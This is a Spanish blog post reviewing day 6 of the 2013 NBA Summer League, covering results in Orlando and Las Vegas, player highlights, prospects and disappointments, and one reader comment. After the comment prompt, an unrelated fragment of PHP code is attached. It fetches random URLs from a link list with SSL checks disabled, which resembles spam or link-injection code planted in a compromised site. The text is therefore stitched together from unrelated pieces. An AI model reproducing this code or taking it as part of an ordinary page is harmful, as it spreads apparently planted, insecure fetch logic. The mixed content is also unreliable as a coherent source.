Summer Leagues: Día 6

13 de July de 2013 por rumbero

Último día de Summer League en Orlando. Oklahoma y Houston jugaban la final para decidir al campeón y fueron los Thunder los ganadores por 85-77 antes unos Rockets que sacaron a los suplentes de los suplentes. Orlando aplicó la misma fórmula y como consecuencia perdieron claramente (83-102) antes unos Celtics que han dejado buenas sensaciones. Miami le ganó a Detroit 85-90 con un gran último cuarto, los Sixers por fin ganaron su primer partido ante los Nets 86-89 y los Pacers hicieron lo propio con los Jazz 70-73.

Mientras, en la otra punta del país se inauguraba la primera jornada de SL en Las Vegas, donde debutaron 8 equipos. Knicks y Pelicans abrieron la jornada con victoria para los de New Orleans 72-77 gracias a un excelente Austin Rivers. Mientras los Clippers se deshacían de los Hawks 90-83 con una buena actuación de un clásico de este blog, unos desconocidísimos Lakers perdían ante los Cavaliers de Waiters y Zeller por 70-62. Para finalizar tuvimos un Bobcats-Spurs que se decidió en un emocionante final con un gamme winner de Cory Joseph (68-69).

DESTACADOS

kentaviousKentavious Caldwell-Pope

El mejor partido del escolta en esta SL. Ya apuntábamos que ha ido sacudiéndose los nervios iniciales y asentando su tiro de media-larga distancia conforme avanzaban los partidos. Ayer sumó 20 puntos en un buen 7/15 FG con 5 rebotes y 4 asistencias.

Tony Mitchell (Detroit Pistons)

16 puntos, 6 rebotes y su habitual dosis de defensa e intensidad. No se guarda nada el chaval, sólo por eso ya nos gusta.

Ian Clark

Seguramente el mejor jugador de Miami durante esta SL. Excelente tirador, muy efectivo (ha promediado un 42.9% en 3P) y con capacidad de pasar el balón cuando es necesario. Ayer 18 puntos, 3 rebotes, 7 asistencias y 6 robos. Lo veremos en Las Vegas también.

Jeremy Lamb

Escogido en el mejor quinteto de la SL. Ha demostrado que puede asumir parte de la responsabilidad anotadora si es necesario. 18 puntos, 3 rebotes y 4 asistencias para él. Hay ganas de verlo con los mayores.

AJ Slaughter

Ayer descansaron todos los “buenos” de Orlando y lo aprovechó para marcarse una de esas actuaciones típicas de la SL. 25 puntos, 3 rebotes, 9 asistencias, 7 robos y 5 pérdidas. No está mal.

Kelly Olynyk

Una de las grandes sensaciones junto a Oladipo. Ayer solo jugó 15 minutos pero tuvo tiempo de meter 12 puntos (6/10 FG) y coger 7 rebotes. También escogido en el mejor quinteto.

riversAustin Rivers

Después de un horrible primer año en la NBA ayer se marcó un auténtico partidazo ante la atenta mirada de su padre. 24 puntos, 6 rebotes y 7 asistencias. A ver si es capaz de mostrar un poco de ese talento cuando empiece lo bueno.

Mason Plumlee & Chris Wright

Los mejores ayer por parte de Brooklyn. El primero volvió a demostrar la buena pinta que tiene después de unos partidos algo grises con 23 puntos, 5 rebotes y 5 asistencias. El segundo anotó también 23 puntos con 7 rebotes y 7 asistencias. Hay que recordar que Wright padece esclerosis múltiple. Uno sólo puede quitarse el sombrero ante eso.

Khalif Wyatt

Un auténtico microondas a lo Jordan Crawford. Si tiene el día es un peligro. 27 puntos para el de los Sixers.

John Jenkins

Gran partido del sophomore de los Hawks. 24 puntos, 6 rebotes y 3 asistencias sin tirar un solo tiro libre. Excelente en el catch & shoot, veremos si consigue ganarse más minutos esta temporada.

Samardo Samuels

A más de uno le van a caer un par de lagrimillas por ver a nuestro amigo en esta sección. 15 puntos y 9 rebotes para ser la referencia interior de los Clippers. Ídolo.

Tyler Zeller

El mejor de los Cavs con 15 puntos y 7 rebotes. Hay que tener en cuenta que tenía delante la “temible” pintura de los Lakers (que Sacre nos perdone).

Jeff Taylor

24 puntos para el sophomore de los Bobcats. A ver si va a ser la mejor elección que ha hecho Jordan…

A SEGUIR

Steven Adams & Andre Roberson

Los dos ya han firmado oficialmente con Oklahoma así que habrá que seguirles la pista. El primero ha ido claramente de menos a más supliendo su falta de recursos con su físico. 10 puntos, 9 rebotes para él. Roberson acabó con 7 puntos y 11 rebotes y demostró una vez más su gran capacidad reboteadora.

Phil Pressey & Colton Iverson & Tom Mitchell

Estos tres han cuajado una buena Summer League. El base anotó 7 puntos con 6 rebotes, 10 asistencias y 5 pérdidas. Parece un jugador muy interesante. Mitchell por su parte acabó con 14 puntos, 2 rebotes y 3 asistencias mientras que Iverson sumó 12 puntos y 6 rebotes en apenas un cuarto de hora. Veremos qué deciden desde Boston con ellos.

hardawayTim Hardawy Jr.

El mejor en el estreno de los Knicks en las Vegas. Acabó el partido con 13 puntos, 3 rebotes y 3 asistencias. Estaremos atentos a su evolución.

Lucas Nogueira

Los que seguís un poco la ACB tendréis visto al pívot del Estudiantes. 10 puntos, 8 rebotes, 2 asistencias y 1 tapón. Suple sus limitaciones técnicas con un gran físico (aunque le falten unos kilos) y su capacidad para meter para abajo las que le llegan.

Reggie Bullock

Buen partido del rookie de los Clippers con 18 puntos. Siendo básicamente un tirador, lo va a tener más que complicado este año con la batería exterior que tienen en LA.

Cody Zeller

Algo perdido, acabó el partido con 8 puntos, 5 rebotes y 2 asistencias. Se ha hablado mucho sobre su elección y va a tener muchos ojos sobre él, a ver cómo responde a la presión.

Deshaun Thomas

18 puntos para la segunda ronda de los Spurs. Sabiendo la habilidad que tienen en San Antonio para sacar robos habrá que seguirle la pista.

Michael Kidd-Gilchrist

Se comenta que ha estado trabajando su tiro y ayer acabó el partido con 12 puntos y un 50% de efectividad. Veremos si es verdad. Partido completo como suele ser habitual.

DECEPCIONES

Solomon Hill

Su último partido en Orlando ha sido el peor de los que ha jugado. Un mal día en el tiro le condenó a anotar sólo 2 puntos (1/7 FG) mientras su colega Orlando Johnson metía 18. Lo tomamos como algo puntual; ha hecho una buena SL y ha sido escogido en el segundo mejor quintento.

stocktonMichael Stockton

Bien con 6 puntos y 3 rebotes en 15 minutos…pero el hijo de John Stockton no puede acabar un partido sin dar una sola asistencia. Que no le dejen entrar en casa.

MCW

No nos hemos olvidado de Michael, no. Partido gris con 11 puntos (5/16 FG) 2 rebotes, 5 asistencias, 2 robos y 3 pérdidas. Muchísimas dudas con él en esta SL. A su mal tiro se le suman las malas decisiones que se le han visto como organizador de juego. Lo bueno es que no le van a faltar minutos en RS y por ahí debe venir su mejoría.

Trey Burke

El otro que nos faltaba. Le hemos cogido cariño, como a MCW, pero no ha habido manera de sacarlo de esta sección. Trey ha acabado con un 1/19 desde el triple (Rudy style) y un 24% en FG. Posiblemente la mayor de las decepciones de esta Summer League pero, como a MCW, no le van a faltar minutos.

Comenta

Un comentario a esta entrada

  1. Denise dice:
    #1

    Pfff..McLemore de mi vida…4 de 23 en tiros de campo,

    Gran debut de McCollum, 22 puntos, 4 asistencias, buenos %

    Y Otto Porter tampoco estuvo muy fino, pero le estuve viendo un rato y creo que tiene mcuho potencial y bastante margen de mejora, al menos intenta varios movimientos en ataque no solo tirar abierto.

    El crack de la jornada fue Goudelock con 26 puntos, este hombre tiene mucha más calidad que muchos que juegan a diario en la NBA, para mí debe ser un hombre de rotación y no un maginal fondo de armario. Lo ficharía para Orlando.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>